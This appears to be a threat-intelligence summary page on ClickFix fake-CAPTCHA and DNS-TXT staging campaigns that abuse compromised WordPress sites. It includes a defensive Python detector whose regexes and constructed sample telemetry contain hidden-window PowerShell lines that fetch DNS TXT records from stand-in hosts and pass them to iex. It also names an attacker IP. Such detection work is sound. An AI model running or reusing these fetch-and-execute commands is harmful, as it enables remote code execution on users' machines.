Mallory

ClickFix Social-Engineering Campaigns Using Compromised WordPress Sites and DNS-Based Staging

Tags: captcha phishing, dns staging, clickfix, website compromise, wordpress, information stealer, seo spam, remote access trojan, social engineering, cloudflare turnstile, dns txt records, netsupport rat, user-agent checks, directory shadowing, self-infection

Updated February 5, 2026 at 06:01 AM (2 sources)


Threat actors are scaling ClickFix-style “self-infection” attacks that abuse compromised legitimate websites to trick users into manually executing malicious PowerShell via the Windows Run dialog or a terminal. Reporting describes the KongTuke campaign evolving its tradecraft by retrieving next-stage instructions from DNS TXT records rather than over HTTP, reducing visibility for controls focused on web traffic and blending activity into normal DNS resolution. The objective is follow-on malware deployment and persistence, including installation of remote-access tooling such as the Interlock RAT.

Separately, researchers described a large watering-hole operation dubbed IClickFix that poisoned 3,800+ WordPress sites with a fake Cloudflare Turnstile CAPTCHA prompt that instructs visitors to copy/paste and run a “fix” command. Once executed, the staged PowerShell pulls commodity payloads including NetSupport RAT, Emmenhtal Loader, and XFiles Stealer, and uses tracking/targeting logic (e.g., an ic-tracker-js HTML tag) to manage victim flow. In contrast, a different WordPress compromise technique called “directory shadowing” was reported as an SEO-spam operation that creates physical folders matching WordPress permalinks and serves gambling content selectively to crawlers (via User-Agent checks), which is not part of the ClickFix execution chain.
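As an added defender-side example (not code from the reporting summarised above), the following Python scores process-creation telemetry for the two behaviours this summary describes: a script host launched from the Windows Run dialog (parent explorer.exe) and a command line that pulls DNS TXT records for execution. The event shape, rule weights, threshold and all sample command lines are constructed assumptions, not observed indicators.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:  # one process-creation record (Sysmon EID 1 / Security 4688 style)
    parent_image: str
    image: str
    command_line: str


# Hypothetical weights; tune against your own baseline before alerting on them.
RULES = [
    ("dns_txt_lookup", 2, re.compile(
        r"nslookup\b.*-(?:type|q(?:uerytype)?)=txt|Resolve-DnsName\b.*-Type\s+TXT", re.I)),
    ("hidden_window", 1, re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("inline_eval", 1, re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I)),
    ("encoded_command", 1, re.compile(r"\s-e(?:nc(?:odedcommand)?)?\s", re.I)),
]
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe"}
THRESHOLD = 4  # explorer parent + a TXT lookup alone (score 3) is suspicious, not an alert


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(e: ProcessEvent) -> dict:
    """Return the score, the matched rule names and whether the event crosses THRESHOLD."""
    reasons, score = [], 0
    # A script host spawned directly by explorer.exe is what the Run dialog produces.
    if basename(e.parent_image) == "explorer.exe" and basename(e.image) in SCRIPT_HOSTS:
        reasons.append("run_dialog_parent")
        score += 1
    for name, weight, rx in RULES:
        if rx.search(e.command_line):
            reasons.append(name)
            score += weight
    return {"score": score, "reasons": reasons, "flag": score >= THRESHOLD}


def flag_events(events: list) -> list:
    """Indices of events that should raise an alert."""
    return [i for i, e in enumerate(events) if score_event(e)["flag"]]


# Constructed sample telemetry (not from any real incident); .invalid is a reserved TLD.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe", PS, 'powershell -w hidden -c "iex (nslookup -type=txt verify.example.invalid)"'),
    ProcessEvent(r"C:\Windows\explorer.exe", PS, "powershell.exe"),  # user simply opened a console
    ProcessEvent(r"C:\Windows\System32\svchost.exe", PS, r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"),  # scheduled task
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe", "cmd.exe /c nslookup -type=txt _dmarc.example.com"),  # admin checking DMARC
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Program Files\PowerShell\7\pwsh.exe", 'pwsh -nop -w hidden -c "iex ((Resolve-DnsName -Type TXT cfg.example.invalid).Strings)"'),
]
```

`flag_events(SAMPLE_EVENTS)` returns `[0, 4]`: the two hidden-window, TXT-to-iex launches from explorer.exe, while the administrator's DMARC lookup scores 3 and stays below the threshold.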

Related Stories

ClickFix Social-Engineering Lures Deliver Multi-Stage Windows Malware via Browser Extensions and Compromised WordPress Sites

Threat researchers reported continued evolution and operationalization of **ClickFix**-style social engineering, where victims are tricked into manually executing attacker-supplied commands via the Windows Run dialog. Huntress described a new variant dubbed **CrashFix**, attributed to **KongTuke**, which uses a **malicious browser extension** to display a fake “browser stopped abnormally” security warning and a bogus “scan” flow; the extension silently places a **PowerShell** command on the clipboard, disguised as a legitimate repair action, and instructs the user to paste-and-run it, leading to code execution. Rapid7 Labs separately documented a large-scale campaign in which an unidentified actor compromises legitimate **WordPress** sites to inject a ClickFix implant that impersonates a **Cloudflare human verification (CAPTCHA)** challenge. The operation has affected **250+** infected sites across **12+ countries** and delivers a **multi-stage, mostly in-memory** malware chain (obfuscated JavaScript → PowerShell stagers → in-memory loaders/shellcode) aimed at stealing **credentials and digital wallets** from Windows systems, enabling downstream financial theft and potential follow-on intrusion using harvested credentials.

1 week ago
ClickFix Campaign Hijacks WordPress Sites to Deliver Infostealers via Fake Cloudflare CAPTCHA

Threat actors covertly compromised **250+ legitimate WordPress websites**—including small businesses, regional media outlets, and at least one **U.S. Senate candidate** campaign site—and used them as distribution points for an **infostealer** operation. Rapid7 reported that attackers injected malicious code into the compromised sites to display a convincing **fake Cloudflare CAPTCHA** page that instructs visitors to **copy and execute a command** on their own machines, leveraging the **ClickFix** social-engineering technique to initiate malware delivery. Once executed, the malicious command leads to installation of credential-stealing malware capable of exfiltrating **browser-stored credentials**, **authentication cookies**, and **cryptocurrency wallet data**, with stolen “logs” potentially monetized on cybercrime forums. Reporting indicates the campaign has been active since **December** and shows signs of **high automation** across unrelated WordPress instances; Rapid7 also noted attacker-controlled domains used in the operation were registered around **July–August**, and the firm said it **notified U.S. authorities** to support investigation and remediation.

5 days ago
ClickFix Social-Engineering Technique Using Fake CAPTCHA to Trigger Manual Command Execution

A **ClickFix**-style malware campaign has been observed using **fake CAPTCHA** pages on compromised websites to trick users into **manually executing** malicious commands, enabling initial access while evading controls that focus on downloaded files. In the reported activity, victims are prompted to copy a **PowerShell** command and run it themselves; the script then downloads additional stages from attacker infrastructure (including `91.92.240.219`), verifies user interaction by checking clipboard activity, and proceeds through a multi-stage infection chain. The payload is an **information stealer** targeting data from **25+ web browsers**, cryptocurrency wallets (e.g., *MetaMask*), and enterprise VPN configurations, with checks for virtualized environments and security tooling prior to exfiltration. Separately reported threat activity in the same time window includes **UnsolicitedBooker** targeting Central Asian telecoms with phishing-delivered backdoors (**LuciDoor** and **MarsSnake**) and **APT28** running *Operation MacroMaze*, which uses weaponized Office documents and `INCLUDEPICTURE` fields pointing to `webhook[.]site` URLs as a tracking mechanism and to support follow-on macro-based payload delivery. A video-style weekly briefing also mentions an evolution of ClickFix where an initial command uses `nslookup` and parses the response for execution, but it is a multi-topic roundup rather than a primary source on the fake-CAPTCHA infostealer campaign; a malware newsletter roundup is likewise a link collection and does not add specific, corroborating details about the ClickFix CAPTCHA infostealer operation.

3 weeks ago